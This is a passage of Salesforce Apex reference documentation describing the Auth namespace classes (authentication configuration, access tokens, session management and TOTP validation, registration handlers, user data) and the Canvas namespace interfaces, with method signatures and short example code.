public String getFooterText()
Return Value
Type: String
The text string displayed at the bottom of the login page, for example Log in with an existing account.
getLogoUrl()
Returns the location of the icon image at the bottom of the login page for a community.
Signature
public String getLogoUrl()
Return Value
Type: String
The path to the icon image.
getSamlProviders()
Returns the list of SAML-based authentication providers available for a community or custom domain.
Signature
public List<SamlSsoConfig> getSamlProviders()
503
Reference
AuthConfiguration Class
Return Value
Type: List<SamlSsoConfig>
A list of SAML-based authentication providers (SamlSsoConfig sObjects).
Signature
public static String getSamlSsoUrl(String cUrl, String startURL, String samlId)
Parameters
cUrl
Type: String
The URL for the community or custom domain. If null or specified as an empty string, youll get the URL for a custom domain.
startUrl
Type: String
The page users see after successfully logging in to the community or custom domain.
samlId
Type: String
The unique name of the SAML configuration for thecommunity or custom domain.
Return Value
Type: String
The Single Sign-On Initialization URL for the community or custom domain.
getSelfRegistrationEnabled()
Indicates whether the current community allows new users to create their own account by filling out a registration form.
Signature
public Boolean getSelfRegistrationEnabled()
Return Value
Type: Boolean
getSelfRegistrationUrl()
Returns the location of the self-registration page for new users to sign up for an account with a community.
Signature
public String getSelfRegistrationUrl()
504
Reference
AuthToken Class
Return Value
Type: String
The location of the self-registration page.
getStartUrl()
Returns the page of a community or custom domain displayed after a user logs in.
Signature
public String getStartUrl()
Return Value
Type: String
The location of the community or custom domain start page.
getUsernamePasswordEnabled()
Indicates whether the current community is set to display a login form asking for a username and password. You can configure the
community not to request a username and password if it is for unauthenticated users or users logging in with a third-party authentication
provider.
Signature
public Boolean getUsernamePasswordEnabled()
Return Value
Type: Boolean
AuthToken Class
Contains methods for providing the access token associated with an authentication provider for an authenticated user, except for the
Janrain provider.
Namespace
Auth
AuthToken Methods
The following are methods for AuthToken. All are instance methods.
IN THIS SECTION:
getAccessToken(String, String)
Returns an access token for the current user using the specified 18-character identifier of an Auth. Provider definition in your
organization and the name of the provider, such as Salesforce or Facebook.
505
Reference
AuthToken Class
getAccessTokenMap(String, String)
Returns a map from the third-party identifier to the access token for the currently logged-in Salesforce user. The identifier value
depends on the third party. For example, for Salesforce it would be the user ID, while for Facebook it would be the user number.
refreshAccessToken(String, String, String)
Returns a map from the third-party identifier containing a refreshed access token for the currently logged-in Salesforce user.
getAccessToken(String, String)
Returns an access token for the current user using the specified 18-character identifier of an Auth. Provider definition in your organization
and the name of the provider, such as Salesforce or Facebook.
Signature
public String getAccessToken(String authProviderId, String providerName)
Parameters
authProviderId
Type: String
providerName
Type: String
Return Value
Type: String
getAccessTokenMap(String, String)
Returns a map from the third-party identifier to the access token for the currently logged-in Salesforce user. The identifier value depends
on the third party. For example, for Salesforce it would be the user ID, while for Facebook it would be the user number.
Signature
public Map<String, String> getAccessTokenMap(String authProviderId, String providerName)
Parameters
authProviderId
Type: String
providerName
Type: String
Return Value
Type: Map<String, String>
506
Reference
CommunitiesUtil Class
Signature
public Map<String, String> refreshAccessToken(String authProviderId, String providerName,
String oldAccessToken)
Parameters
authProviderId
Type: String
providerName
Type: String
oldAccessToken
Type: String
Return Value
Type: Map<String, String>
Usage
This method works when using Salesforce or an OpenID Connect provider, but not when using Facebook or Janrain. The returned map
contains AccessToken and RefreshError keys. Evaluate the keys in the response to check if the request was successful. For a
successful request, the RefreshError value is null, and AccessToken is a token value. For an unsuccessful request, the
RefreshError value is an error message, and the AccessToken value is null.
When successful, this method updates the token stored in the database, which you can get using
Auth.AuthToken.getAccessToken().
Example
String accessToken = Auth.AuthToken.getAccessToken('0SOD000000000De', 'Open ID connect');
Map<String, String> responseMap = Auth.AuthToken.refreshAccessToken('0SOD000000000De',
'Open ID connect', accessToken);
CommunitiesUtil Class
Contains methods for getting information about a community user.
Namespace
Auth
507
Reference
CommunitiesUtil Class
Example
The following example directs a guest (unauthenticated) user to one page, and authenticated users of the communitys parent organization
to another page.
if (Auth.CommunitiesUtil.isGuestUser())
// Redirect to the login page if user is an unauthenticated user
return new PageReference(LOGIN_URL);
if (Auth.CommunitiesUtil.isInternalUser())
// Redirect to the home page if user is an internal user
return new PageReference(HOME_URL);
CommunitiesUtil Methods
The following are methods for CommunitiesUtil. All methods are static.
IN THIS SECTION:
getLogoutUrl()
Returns the page to display after the current community user logs out.
getUserDisplayName()
Returns the current users community display name.
isGuestUser()
Indicates whether the current user isnt logged in to the community and may need to be redirected to log in, if required.
isInternalUser()
Indicates whether the current user is logged in as a member of the parent Salesforce organization, such as an employee.
getLogoutUrl()
Returns the page to display after the current community user logs out.
Signature
public static String getLogoutUrl()
Return Value
Type: String
getUserDisplayName()
Returns the current users community display name.
Signature
public static String getUserDisplayName()
508
Reference
RegistrationHandler Interface
Return Value
Type: String
isGuestUser()
Indicates whether the current user isnt logged in to the community and may need to be redirected to log in, if required.
Signature
public static Boolean isGuestUser()
Return Value
Type: Boolean
isInternalUser()
Indicates whether the current user is logged in as a member of the parent Salesforce organization, such as an employee.
Signature
public static Boolean isInternalUser()
Return Value
Type: Boolean
RegistrationHandler Interface
Salesforce provides the ability to use an authentication provider, such as Facebook or Janrain, for single sign-on into Salesforce.
Namespace
Auth
Usage
To set up single sign-on, you must create a class that implements Auth.RegistrationHandler. Classes implementing the
Auth.RegistrationHandler interface are specified as the Registration Handler in authorization provider definitions,
and enable single sign-on into Salesforce portals and organizations from third-party services such as Facebook. Using information from
the authentication providers, your class must perform the logic of creating and updating user data as appropriate, including any associated
account and contact records.
IN THIS SECTION:
RegistrationHandler Methods
Storing User Information and Getting Access Tokens
Auth.RegistrationHandler Example Implementation
509
Reference
RegistrationHandler Interface
RegistrationHandler Methods
The following are methods for RegistrationHandler.
IN THIS SECTION:
createUser(ID, Auth.UserData)
Returns a User object using the specified portal ID and user information from the third party, such as the username and email address.
The User object corresponds to the third partys user information and may be a new user that hasnt been inserted in the database
or may represent an existing user record in the database.
updateUser(ID, ID, Auth.UserData)
Updates the specified users information. This method is called if the user has logged in before with the authorization provider and
then logs in again, or if your application is using the Existing User Linking URL. This URL is generated when you define
your authentication provider.
createUser(ID, Auth.UserData)
Returns a User object using the specified portal ID and user information from the third party, such as the username and email address.
The User object corresponds to the third partys user information and may be a new user that hasnt been inserted in the database or
may represent an existing user record in the database.
Signature
public User createUser(ID portalId, Auth.UserData userData)
Parameters
portalId
Type: ID
userData
Type: Auth.UserData
Return Value
Type: User
Usage
The portalID value may be null or an empty key if there is no portal configured with this provider.
Signature
public Void updateUser(ID userId, ID portalId, Auth.UserData userData)
510
Reference
RegistrationHandler Interface
Parameters
userId
Type: ID
portalId
Type: ID
userData
Type: Auth.UserData
Return Value
Type: Void
Usage
The portalID value may be null or an empty key if there is no portal configured with this provider.
511
Reference
RegistrationHandler Interface
of access tokens for each third-party user. For more information about authentication providers, see About External Authentication
Providers in the Salesforce online help.
When using Janrain as an authentication provider, you need to use the Janrain accessCredentials dictionary values to retrieve
the access token or its equivalent. Only some providers supported by Janrain provide an access token, while other providers use other
fields. The Janrain accessCredentials fields are returned in the attributeMap variable of the Auth.UserData class.
See the Janrain auth_info documentation for more information on accessCredentials.
Note: Not all Janrain account types return accessCredentials. You may need to change your account type to receive the
information.
To learn about the Auth.AuthToken methods, see Auth.AuthToken Class.
512
Reference
SessionManagement Class
SessionManagement Class
Contains methods for customizing security levels, two-factor authentication, and trusted IP ranges for a current session.
Namespace
Auth
SessionManagement Methods
The following are methods for SessionManagement. All methods are static. Use these methods to customize your two-factor
authentication implementation and manage the use of time-based one-time password (TOTP) apps like Google Authenticator with a
Salesforce organization. Or, use them to validate a users incoming IP address against trusted IP range settings for an organization or
profile.
513
Reference
SessionManagement Class
IN THIS SECTION:
getCurrentSession()
Returns a map of attributes for the current session.
getQrCode()
Returns a map containing a URL to a quick response (QR) code and a time-based one-time password (TOTP) shared secret to configure
two-factor authentication apps or devices.
inOrgNetworkRange(String)
Indicates whether the given IP address is within the organization's trusted IP range according to the organization's Network Access
settings.
isIpAllowedForProfile(String, String)
Indicates whether the given IP address is within the trusted IP range for the given profile.
setSessionLevel(Auth.SessionLevel)
Sets the user's current session security level.
validateTotpTokenForKey(String, String)
Indicates whether a given time-based one-time password (TOTP) code (token) is valid for the given shared key.
validateTotpTokenForUser(String)
Indicates whether a given time-based one-time password (TOTP) code (token) is valid for the current user.
getCurrentSession()
Returns a map of attributes for the current session.
Signature
public static Map<String, String> getCurrentSession()
Return Value
Type: Map<String, String>
Usage
The map includes a ParentId value, which is the 18-character ID for the parent session, if one exists (for example, if the current
session is for a canvas app). If the current session doesnt have a parent, this value is null. The map also includes the LogoutUrl
assigned to the current session.
Example
The following example shows the name-value pairs in a map returned by getCurrentSession(). Note that UsersId includes
an s in the name to match the name of the corresponding field in the AuthSession object.
{
SessionId=0Ak###############,
UserType=Standard,
ParentId=0Ak###############,
NumSecondsValid=7200,
LoginType=SAML Idp Initiated SSO,
[email protected],
514
Reference
SessionManagement Class
getQrCode()
Returns a map containing a URL to a quick response (QR) code and a time-based one-time password (TOTP) shared secret to configure
two-factor authentication apps or devices.
Signature
public static Map<String, String> getQrCode()
Return Value
Type: Map<String, String>
Usage
The QR code encodes the returned secret as well as the current user's username. The keys are qrCodeUrl and secret. Calling this
method does not change any state for the user, nor does it read any state from the user. This method returns a brand new secret every
time it is called, does not save that secret anywhere, and does not validate the TOTP token. The admin must explicitly save the values
for the user after verifying a TOTP token with the secret.
The secret is a base32-encoded string of a 20-byte shared key.
Example
The following is an example of how to request the QR code.
public String getGetQRCode() {
return getQRCode();
}
public String getQRCode() {
Map<String, String> codeResult = Auth.SessionManagement.getQrCode();
String result = 'URL: '+codeResult.get('qrCodeUrl') + ' SECRET: ' +
codeResult.get('secret');
return result;
}
515
Reference
SessionManagement Class
inOrgNetworkRange(String)
Indicates whether the given IP address is within the organization's trusted IP range according to the organization's Network Access
settings.
Signature
public static Boolean inOrgNetworkRange(String ipAddress)
Parameters
ipAddress
Type: String
The IP address to validate.
Return Value
Type: Boolean
Usage
If a trusted IP range is not defined, this returns false, and throws an exception if the IP address is not valid.
Trusted IP Range Exists?
Return Value
Yes
Yes
true
Yes
No
false
No
N/A
false
isIpAllowedForProfile(String, String)
Indicates whether the given IP address is within the trusted IP range for the given profile.
Signature
public static Boolean isIpAllowedForProfile(String profileId, String ipAddress)
Parameters
profileId
Type: String
The 15-character alphanumeric string for the current users profile ID.
ipAddress
Type: String
The IP address to validate.
516
Reference
SessionManagement Class
Return Value
Type: Boolean
Usage
If a trusted IP range is not defined, this returns true, and throws an exception if the IP address is not valid or if the profile ID is not valid.
Trusted IP Range Exists?
Return Value
Yes
Yes
true
Yes
No
false
No
N/A
true
setSessionLevel(Auth.SessionLevel)
Sets the user's current session security level.
Signature
public static Void setSessionLevel(Auth.SessionLevel level)
Parameters
level
Type: Auth.SessionLevel
The session security level to assign to the user. The meaning of each level can be customized in the Session Settings for each
organization, such as setting the High Assurance level to apply only to users who authenticated with two-factor authentication or
through a specific identity provider.
Return Value
Type: Void
Usage
This setting affects the session level of all sessions associated with the current session, such as Visualforce, Salesforce Files Sync, or UI
access.
Example
The following is an example class for setting the session level.
public class RaiseSessionLevel{
public void setLevelHigh() {
Auth.SessionManagement.setSessionLevel(Auth.SessionLevel.HIGH_ASSURANCE);
}
public void setLevelStandard() {
Auth.SessionManagement.setSessionLevel(Auth.SessionLevel.STANDARD);
517
Reference
SessionManagement Class
}
}
validateTotpTokenForKey(String, String)
Indicates whether a given time-based one-time password (TOTP) code (token) is valid for the given shared key.
Signature
public static Boolean validateTotpTokenForKey(String sharedKey, String totpCode)
Parameters
sharedKey
Type: String
The shared (secret) key. The sharedKey must be a base32-encoded string of a 20-byte shared key.
totpCode
Type: String
The time-based one-time password (TOTP) code to validate.
Return Value
Type: Boolean
Usage
If the key is invalid, or the current user has attempted too many validations, this method throws an exception.
validateTotpTokenForUser(String)
Indicates whether a given time-based one-time password (TOTP) code (token) is valid for the current user.
Signature
public static Boolean validateTotpTokenForUser(String totpCode)
Parameters
totpCode
Type: String
The time-based one-time password (TOTP) code to validate.
Return Value
Type: Boolean
518
Reference
SessionLevel Enum
Usage
If the current user does not have a TOTP code, this method throws an exception. If the current user has attempted too many validations,
this method throws an exception.
SessionLevel Enum
An Auth.SessionLevel enum value is used by the SessionManagement.setSessionLevel method.
Namespace
Auth
Enum Values
Value
Description
LOW
The users security level for the current session meets the lowest requirements.
Note: This low level is not available, nor used, in the Salesforce UI. User
sessions through the Salesforce UI are either standard or high assurance. You
can set this level using the API, but users assigned this level will experience
unpredictable and reduced functionality in their Salesforce organization.
STANDARD
The users security level for the current session meets the Standard requirements
set in the current organization Session Security Levels.
HIGH_ASSURANCE
The users security level for the current session meets the High Assurance
requirements set in the current organization Session Security Levels.
Usage
Session-level security controls user access to features that support it, such as connected apps and reporting. For example, You can
customize an organizations Session Settings to require users to log in with two-factor authentication to get a High Assurance session.
Then, you can restrict access to a specific connected app by requiring a High Assurance session level in the settings for the connected
app.
UserData Class
Stores user information for Auth.RegistrationHandler.
Namespace
Auth
IN THIS SECTION:
UserData Constructors
UserData Properties
519
Reference
UserData Class
UserData Constructors
The following are constructors for UserData.
IN THIS SECTION:
UserData(String, String, String, String, String, String, String, String, String, String, MAP<String,String>)
Creates a new instance of the Auth.UserData class using the specified arguments.
UserData(String, String, String, String, String, String, String, String, String, String, MAP<String,String>)
Creates a new instance of the Auth.UserData class using the specified arguments.
Signature
public UserData(String identifier, String firstName, String lastName, String fullName,
String email, String link, String userName, String locale, String provider, String
siteLoginUrl, Map<String, String> attributeMap)
Parameters
identifier
Type: String
An identifier from the third party for the authenticated user, such as the Facebook user number or the Salesforce user ID.
firstName
Type: String
The first name of the authenticated user, according to the third party.
lastName
Type: String
The last name of the authenticated user, according to the third party.
fullName
Type: String
The full name of the authenticated user, according to the third party.
email
Type: String
The email address of the authenticated user, according to the third party.
link
Type: String
A stable link for the authenticated user such as https://www.facebook.com/MyUsername.
userName
Type: String
The username of the authenticated user in the third party.
locale
Type: String
The standard locale string for the authenticated user.
520
Reference
UserData Class
provider
Type: String
The service used to log in, such as Facebook or Janrain.
siteLoginUrl
Type: String
The site login page URL passed in if used with a site; null otherwise.
attributeMap
UserData Properties
The following are properties for UserData.
IN THIS SECTION:
identifier
An identifier from the third party for the authenticated user, such as the Facebook user number or the Salesforce user ID.
firstName
The first name of the authenticated user, according to the third party.
lastName
The last name of the authenticated user, according to the third party.
fullName
The full name of the authenticated user, according to the third party.
email
The email address of the authenticated user, according to the third party.
link
A stable link for the authenticated user such as https://www.facebook.com/MyUsername.
username
The username of the authenticated user in the third party.
locale
The standard locale string for the authenticated user.
provider
The service used to log in, such as Facebook or Janrain.
siteLoginUrl
The site login page URL passed in if used with a site; null otherwise.
attributeMap
A map of data from the third party, in case the handler has to access non-standard values. For example, when using Janrain as a
provider, the fields Janrain returns in its accessCredentials dictionary are placed into the attributeMap. These fields
vary by provider.
521
Reference
UserData Class
identifier
An identifier from the third party for the authenticated user, such as the Facebook user number or the Salesforce user ID.
Signature
public String identifier {get; set;}
Property Value
Type: String
firstName
The first name of the authenticated user, according to the third party.
Signature
public String firstName {get; set;}
Property Value
Type: String
lastName
The last name of the authenticated user, according to the third party.
Signature
public String lastName {get; set;}
Property Value
Type: String
fullName
The full name of the authenticated user, according to the third party.
Signature
public String fullName {get; set;}
Property Value
Type: String
email
The email address of the authenticated user, according to the third party.
522
Reference
UserData Class
Signature
public String email {get; set;}
Property Value
Type: String
link
A stable link for the authenticated user such as https://www.facebook.com/MyUsername.
Signature
public String link {get; set;}
Property Value
Type: String
username
The username of the authenticated user in the third party.
Signature
public String username {get; set;}
Property Value
Type: String
locale
The standard locale string for the authenticated user.
Signature
public String locale {get; set;}
Property Value
Type: String
provider
The service used to log in, such as Facebook or Janrain.
Signature
public String provider {get; set;}
523
Reference
Canvas Namespace
Property Value
Type: String
siteLoginUrl
The site login page URL passed in if used with a site; null otherwise.
Signature
public String siteLoginUrl {get; set;}
Property Value
Type: String
attributeMap
A map of data from the third party, in case the handler has to access non-standard values. For example, when using Janrain as a provider,
the fields Janrain returns in its accessCredentials dictionary are placed into the attributeMap. These fields vary by provider.
Signature
public Map<String, String> attributeMap {get; set;}
Property Value
Type: Map<String, String>
Canvas Namespace
The Canvas namespace provides an interface and classes for canvas apps in Salesforce.
The following are the interfaces and classes in the Canvas namespace.
IN THIS SECTION:
ApplicationContext Interface
Use this interface to retrieve application context information, such as the application version or URL.
CanvasLifecycleHandler Interface
Implement this interface to control context information and add custom behavior during the application render phase.
ContextTypeEnum Enum
Describes context data that can be excluded from canvas app context data. You specify which context types to exclude in the
excludeContextTypes() method in your CanvasLifecycleHandler implementation.
EnvironmentContext Interface
Use this interface to retrieve environment context information, such as the app display location or the configuration parameters.
RenderContext Interface
A wrapper interface that is used to retrieve application and environment context information.
524
Reference
ApplicationContext Interface
Test Class
Contains methods for automated testing of your Canvas classes.
Canvas Exceptions
The Canvas namespace contains exception classes.
ApplicationContext Interface
Use this interface to retrieve application context information, such as the application version or URL.
Namespace
Canvas
Usage
The ApplicationContext interface provides methods to retrieve application information about the canvas app thats being
rendered. Most of the methods are read-only. For this interface, you dont need to create an implementation. Use the default
implementation that Salesforce provides.
IN THIS SECTION:
ApplicationContext Methods
ApplicationContext Methods
The following are methods for ApplicationContext.
IN THIS SECTION:
getCanvasUrl()
Retrieves the fully qualified URL of the canvas app.
getDeveloperName()
Retrieves the internal API name of the canvas app.
getName()
Retrieves the name of the canvas app.
getNamespace()
Retrieves the namespace prefix of the canvas app.
getVersion()
Retrieves the current version of the canvas app.
setCanvasUrlPath(String)
Overrides the URL of the canvas app for the current request.
getCanvasUrl()
Retrieves the fully qualified URL of the canvas app.
525
Reference
ApplicationContext Interface
Signature
public String getCanvasUrl()
Return Value
Type: String
Usage
Use this method to get the URL of the canvas app, for example:
http://instance.salesforce.com:8080/canvas_app_path/canvas_app.jsp.
getDeveloperName()
Retrieves the internal API name of the canvas app.
Signature
public String getDeveloperName()
Return Value
Type: String
Usage
Use this method to get the API name of the canvas app. You specify this value in the API Name field when you expose the canvas
app by creating a connected app.
getName()
Retrieves the name of the canvas app.
Signature
public String getName()
Return Value
Type: String
Usage
Use this method to get the name of the canvas app.
getNamespace()
Retrieves the namespace prefix of the canvas app.
526
Reference
ApplicationContext Interface
Signature
public String getNamespace()
Return Value
Type: String
Usage
Use this method to get the Salesforce namespace prefix thats associated with the canvas app.
getVersion()
Retrieves the current version of the canvas app.
Signature
public String getVersion()
Return Value
Type: String
Usage
Use this method to get the current version of the canvas app. This value changes after you update and republish a canvas app in an
organization. If you are in a Developer Edition organization, using this method always returns the latest version.
setCanvasUrlPath(String)
Overrides the URL of the canvas app for the current request.
Signature
public void setCanvasUrlPath(String newPath)
Parameters
newPath
Type: String
The URL (not including domain) that you need to use to override the canvas app URL.
Return Value
Type: Void
Usage
Use this method to override the URL path and query string of the canvas app. Do not provide a fully qualified URL, because the provided
URL string will be appended to the original canvas URL domain.
527
Reference
CanvasLifecycleHandler Interface
For example, if the current canvas app URL is https://myserver.com:6000/myAppPath and you call
setCanvasUrlPath('/alternatePath/args?arg1=1&arg2=2'), the adjusted canvas app URL will be
https://myserver.com:6000/alternatePath/args?arg1=1&arg2=2.
If the provided path results in a malformed URL, or a URL that exceeds 2,048 characters, a System.CanvasException will be thrown.
This method overrides the canvas app URL for the current request and does not permanently change the canvas app URL as configured
in the UI for the Salesforce canvas app settings.
CanvasLifecycleHandler Interface
Implement this interface to control context information and add custom behavior during the application render phase.
Namespace
Canvas
Usage
Use this interface to specify what canvas context information is provided to your app by implementing the excludeContextTypes()
method. Use this interface to call custom code when the app is rendered by implementing the onRender() method.
If you provide an implementation of this interface, you must implement excludeContextTypes() and onRender().
Example Implementation
The following example shows a simple implementation of CanvasLifecycleHandler that specifies that organization context information
will be excluded and prints a debug message when the app is rendered.
public class MyCanvasListener
implements Canvas.CanvasLifecycleHandler{
public Set<Canvas.ContextTypeEnum> excludeContextTypes(){
Set<Canvas.ContextTypeEnum> excluded = new Set<Canvas.ContextTypeEnum>();
excluded.add(Canvas.ContextTypeEnum.ORGANIZATION);
return excluded;
}
public void onRender(Canvas.RenderContext renderContext){
System.debug('Canvas lifecycle called.');
}
}
IN THIS SECTION:
CanvasLifecycleHandler Methods
CanvasLifecycleHandler Methods
The following are methods for CanvasLifecycleHandler.
528
Reference
CanvasLifecycleHandler Interface
IN THIS SECTION:
excludeContextTypes()
Lets the implementation exclude parts of the CanvasRequest context, if the application does not need it.
onRender(Canvas.RenderContext)
Invoked when a canvas app is rendered. Provides the ability to set and retrieve canvas application and environment context information
during the application render phase.
excludeContextTypes()
Lets the implementation exclude parts of the CanvasRequest context, if the application does not need it.
Signature
public Set<Canvas.ContextTypeEnum> excludeContextTypes()
Return Value
Type: SET<Canvas.ContextTypeEnum>
This method must return null or a set of zero or more ContextTypeEnum values. Returning null enables all attributes by default.
ContextTypeEnum values that can be set are:
Canvas.ContextTypeEnum.ORGANIZATION
Canvas.ContextTypeEnum.RECORD_DETAIL
Canvas.ContextTypeEnum.USER
See ContextTypeEnum on page 530 for more details on these values.
Usage
Implement this method to specify which attributes to disable in the context of the canvas app. A disabled attribute will set the associated
canvas context information to null.
Disabling attributes can help improve performance by reducing the size of the signed request and canvas context. Also, disabled attributes
do not need to be retrieved by Salesforce, which further improves performance.
See the Force.com Canvas Developers Guide for more information on context information in the Context object thats provided in the
CanvasRequest.
Example
This example implementation specifies that the organization information will be disabled in the canvas context.
public Set<Canvas.ContextTypeEnum> excludeContextTypes() {
Set<Canvas.ContextTypeEnum> excluded = new Set<Canvas.ContextTypeEnum>();
excluded.add(Canvas.ContextTypeEnum.ORGANIZATION);
return excluded;
}
onRender(Canvas.RenderContext)
Invoked when a canvas app is rendered. Provides the ability to set and retrieve canvas application and environment context information
during the application render phase.
529
Reference
ContextTypeEnum Enum
Signature
public void onRender(Canvas.RenderContext renderContext)
Parameters
renderContext
Type: Canvas.RenderContext
Return Value
Type: Void
Usage
If implemented, this method is called whenever the canvas app is rendered. The implementation can set and retrieve context information
by using the provided Canvas.RenderContext.
This method is called whenever signed request or context information is retrieved by the client. See the Force.com Canvas Developers
Guide for more information on signed request authentication.
Example
This example implementation prints Canvas lifecycle called. to the debug log when the canvas app is rendered.
public void onRender(Canvas.RenderContext renderContext) {
System.debug('Canvas lifecycle called.');
}
ContextTypeEnum Enum
Describes context data that can be excluded from canvas app context data. You specify which context types to exclude in the
excludeContextTypes() method in your CanvasLifecycleHandler implementation.
Namespace
Canvas
Enum Values
Value
Description
ORGANIZATION
Exclude context information about the organization in which the canvas app is
running.
RECORD_DETAIL
Exclude context information about the object record on which the canvas app
appears.
USER
530
Reference
EnvironmentContext Interface
EnvironmentContext Interface
Use this interface to retrieve environment context information, such as the app display location or the configuration parameters.
Namespace
Canvas
Usage
The EnvironmentContext interface provides methods to retrieve environment information about the current canvas app. For
this interface, you dont need to create an implementation. Use the default implementation that Salesforce provides.
IN THIS SECTION:
EnvironmentContext Methods
EnvironmentContext Methods
The following are methods for EnvironmentContext.
IN THIS SECTION:
addEntityField(String)
Adds a field to the list of object fields that are returned in the signed request Record object when the component appears on a
Visualforce page thats placed on an object.
addEntityFields(Set<String>)
Adds a set of fields to the list of object fields that are returned in the signed request Record object when the component appears
on a Visualforce page thats placed on an object.
getDisplayLocation()
Retrieves the display location where the canvas app is being called from. For example, a value of Visualforce indicates that the canvas
app was called from a Visualforce page.
getEntityFields()
Retrieves the list of object fields that are returned in the signed request Record object when the component appears on a Visualforce
page thats placed on an object.
getLocationUrl()
Retrieves the location URL of the canvas app.
getParametersAsJSON()
Retrieves the current custom parameters for the canvas app. Parameters are returned as a JSON string.
getSublocation()
Retrieves the display sublocation where the canvas app is being called from.
setParametersAsJSON(String)
Sets the custom parameters for the canvas app.
531
Reference
EnvironmentContext Interface
addEntityField(String)
Adds a field to the list of object fields that are returned in the signed request Record object when the component appears on a Visualforce
page thats placed on an object.
Signature
public void addEntityField(String fieldName)
Parameters
fieldName
Type: String
The object field name that you need to add to the list of returned fields., Using * adds all fields that the user has permission to view.
Return Value
Type: Void
Usage
When you use the <apex:canvasApp> component to display a canvas app on a Visualforce page, and that page is associated with
an object (placed on the page layout, for example), you can specify fields to be returned from the related object. See the Force.com
Canvas Developers Guide for more information on the Record object.
Use addEntityField() to add a field to the list of object fields that are returned in the signed request Record object. By default
the list of fields includes ID. You can add fields by name or add all fields that the user has permission to view by calling
addEntityField('*').
You can inspect the configured list of fields by using Canvas.EnvironmentContext.getEntityFields().
Example
This example adds the Name and BillingAddress fields to the list of object fields. This example assumes the canvas app will appear in a
Visualforce page thats associated with the Account page layout.
Canvas.EnvironmentContext env = renderContext.getEnvironmentContext();
// Add Name and BillingAddress to fields (assumes we'll run from the Account detail page)
env.addEntityField('Name');
env.addEntityField('BillingAddress');
addEntityFields(Set<String>)
Adds a set of fields to the list of object fields that are returned in the signed request Record object when the component appears on a
Visualforce page thats placed on an object.
Signature
public void addEntityFields(Set<String> fieldNames)
532
Reference
EnvironmentContext Interface
Parameters
fieldNames
Type: SET<String>
The set of object field names that you need to add to the list of returned fields. If an item in the set is *, all fields that the user has
permission to view are added.
Return Value
Type: Void
Usage
When you use the <apex:canvasApp> component to display a canvas app on a Visualforce page, and that page is associated with
an object (placed on the page layout, for example), you can specify fields to be returned from the related object. See the Force.com
Canvas Developers Guide for more information on the Record object.
Use addEntityFields() to add a set of one or more fields to the list of object fields that are returned in the signed request Record
object. By default the list of fields includes ID. You can add fields by name or add all fields that the user has permission to view by adding
a set that includes * as one of the strings.
You can inspect the configured list of fields by using Canvas.EnvironmentContext.getEntityFields().
Example
This example adds the Name, BillingAddress, and YearStarted fields to the list of object fields. This example assumes that the canvas app
will appear in a Visualforce page thats associated with the Account page layout.
Canvas.EnvironmentContext env = renderContext.getEnvironmentContext();
// Add Name, BillingAddress and YearStarted to fields (assumes we'll run from the Account
detail page)
Set<String> fields = new Set<String>{'Name','BillingAddress','YearStarted'};
env.addEntityFields(fields);
getDisplayLocation()
Retrieves the display location where the canvas app is being called from. For example, a value of Visualforce indicates that the canvas
app was called from a Visualforce page.
Signature
public String getDisplayLocation()
Return Value
Type: String
The return value can be one of the following strings:
ChatterThe canvas app was called from the Chatter tab.
ChatterFeedThe canvas app was called from a Chatter canvas feed item.
MobileNavThe canvas app was called from the navigation menu in Salesforce1.
533
Reference
EnvironmentContext Interface
Usage
Use this method to obtain the display location for the canvas app.
getEntityFields()
Retrieves the list of object fields that are returned in the signed request Record object when the component appears on a Visualforce
page thats placed on an object.
Signature
public List<String> getEntityFields()
Return Value
Type: LIST<String>
Usage
When you use the <apex:canvasApp> component to display a canvas app on a Visualforce page, and that page is associated with
an object (placed on the page layout, for example), you can specify fields to be returned from the related object. See the Force.com
Canvas Developers Guide for more information on the Record object.
Use getEntityFields() to retrieve the list of object fields that are returned in the signed request Record object. By default the list of fields
includes ID. The list of fields can be configured by using the Canvas.EnvironmentContext.addEntityField(String) or
Canvas.EnvironmentContext.addEntityFields(Set<String>) methods.
Example
This example gets the current list of object fields and retrieves each item in the list, printing each field name to the debug log.
Canvas.EnvironmentContext env = renderContext.getEnvironmentContext();
List<String> entityFields = env.getEntityFields();
for (String fieldVal : entityFields) {
System.debug('Environment Context entityField: ' + fieldVal);
}
If the canvas app thats using this lifecycle code was run from the detail page of an Account, the debug log output might look like:
Environment Context entityField: Id
534
Reference
EnvironmentContext Interface
getLocationUrl()
Retrieves the location URL of the canvas app.
Signature
public String getLocationUrl()
Return Value
Type: String
Usage
Use this method to obtain the URL of the page where the user accessed the canvas app. For example, if the user accessed your app by
clicking a link on the Chatter tab, this method returns the URL of the Chatter tab, which would be similar to
https://na1.salesforce.com/_ui/core/chatter/ui/ChatterPage.
getParametersAsJSON()
Retrieves the current custom parameters for the canvas app. Parameters are returned as a JSON string.
Signature
public String getParametersAsJSON()
Return Value
Type: String
Usage
Use this method to get the current custom parameters for the canvas app. The parameters are returned in a JSON string that can be
de-serialized by using the System.JSON.deserializeUntyped(String) method.
Custom parameters can be modified by using the Canvas.EnvironmentContext.setParametersAsJSON(String) string.
Example
This example gets the current custom parameters, de-serializes them into a map, and prints the results to the debug log.
Canvas.EnvironmentContext env = renderContext.getEnvironmentContext();
// Get current custom params
Map<String, Object> currentParams =
(Map<String, Object>) JSON.deserializeUntyped(env.getParametersAsJSON());
System.debug('Environment Context custom paramters: ' + currentParams);
getSublocation()
Retrieves the display sublocation where the canvas app is being called from.
535
Reference
EnvironmentContext Interface
Signature
public String getSublocation()
Return Value
Type: String
The return value can be one of the following strings:
S1MobileCardFullviewThe canvas app was called from a mobile card.
S1MobileCardPreviewThe canvas app was called from a mobile card preview. The user must click the preview to open the app.
S1RecordHomePreviewThe canvas app was called from a record detail page preview. The user must click the preview to open
the app.
S1RecordHomeFullviewThe canvas app was called from a page layout.
Usage
Use this method to obtain the display sublocation for the canvas app. Use only if the primary display location can be displayed on mobile
devices.
setParametersAsJSON(String)
Sets the custom parameters for the canvas app.
Signature
public void setParametersAsJSON(String jsonString)
Parameters
jsonString
Type: String
The custom parameters that you need to set, serialized into a JSON format string.
Return Value
Type: Void
Usage
Use this method to set the current custom parameters for the canvas app. The parameters must be provided in a JSON string. You can
use the System.JSON.serialize(Object) method to serialize a map into a JSON string.
Setting the custom parameters will overwrite the custom parameters that are set for the current request. If you need to modify the
current custom parameters, first get the current set of custom parameters by using getParametersAsJSON(), modify the retrieved
parameter set as needed, and then use this modified set in your call to setParametersAsJSON().
If the provided JSON string exceeds 32KB, a System.CanvasException will be thrown.
536
Reference
RenderContext Interface
Example
